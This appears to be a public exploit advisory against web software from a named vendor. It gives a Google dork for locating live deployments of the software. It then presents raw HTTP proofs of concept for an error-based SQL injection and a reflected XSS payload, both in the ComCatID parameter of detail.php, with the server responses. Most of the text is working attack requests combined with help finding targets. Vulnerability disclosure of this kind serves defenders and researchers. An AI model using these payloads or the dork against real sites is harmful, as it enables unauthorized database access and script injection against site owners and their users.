# Exploit Title: WEBWORX TECHNOLOGIES- Multiple Vulnerabilities - Multiple Vulnerabilities # Date: March 25, 2025 # Exploit Author: wa0_3 # Telegram: @wa0_3 # Vendor Homepage: https://webworx.technology/ # Version: 1.0 # Tested on: Windows, local xampp # DBMS: MySQL # CVE: N/A # Google Dork: intxt: Developed by Webworx Technologies inurl:detail.php?ComCatID= inurl:detail.php?ComCatID= Vulnerability: SQLi Type: error-based (MySQL) File: detail.php parameter:comCatID ## Proof of Concept (PoC): GET /detail.php?ComCatID=26' HTTP/1.1 Host: localhost Accept-Encoding: gzip, deflate, br Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36 Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="128", "Chromium";v="128" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 Content-Length: 0 Response: HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 11:09:32 GMT Server: Apache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 173 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\' ORDER BY CompanyID ASC' at line 1 ============================================================================================================================================================================= Vulnerability: Reflected XSS File: detail.php parameter:comCatID ## Proof of Concept (PoC): GET /detail.php?ComCatID=2526%00kph88<script>alert(1)<%2fscript>itghj HTTP/1.1 Host:localhost Accept-Encoding: gzip, deflate, br Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36 Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="128", "Chromium";v="128" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 Content-Length: 0 Response: alert popup message with (1)